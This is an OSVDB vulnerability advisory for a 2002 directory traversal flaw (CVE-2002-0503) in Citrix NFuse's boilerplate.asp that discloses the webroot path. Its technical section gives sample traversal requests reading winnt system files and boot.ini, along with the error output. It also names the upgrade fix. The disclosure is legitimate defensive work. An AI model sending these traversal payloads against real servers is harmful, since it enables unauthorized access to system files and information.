Citrix NFuse boilerplate.asp Directory Traversal

2002-06-11T00:00:00
ID OSVDB:3569
Type osvdb
Reporter OSVDB
Modified 2002-06-11T00:00:00

Description

Vulnerability Description

Citrix Nfuse contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when submitting a carefully crafted request via boilerplate.asp, which will disclose the location of the webroot resulting in a loss of confidentiality.

Technical Description

A command such as: http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica

Can be replaced with one like this: http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/

It seems to work with things in winnt and winnt/system32, it doesn't seem to like things back on the c:\ which gives up its very minor vuln of the path of wwwroot. http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories

There was an error:The Citrix HTML template specified does not exist or could not be accessed. The template file specified was: c:\inetpub\wwwroot../../boot.ini

Solution Description

Upgrade to version 1.6 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Citrix Nfuse contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when submitting a carefully crafted request via boilerplate.asp, which will disclose the location of the webroot resulting in a loss of confidentiality.

References:

Vendor URL: http://www.citrix.com Vendor URL: http://www.citrix.com/products/nfuse/default.asp Other Advisory URL: http://archives.neohapsis.com/archives/bugtraq/2002-03/0343.html ISS X-Force ID: 8654 CVE-2002-0503 Bugtraq ID: 4382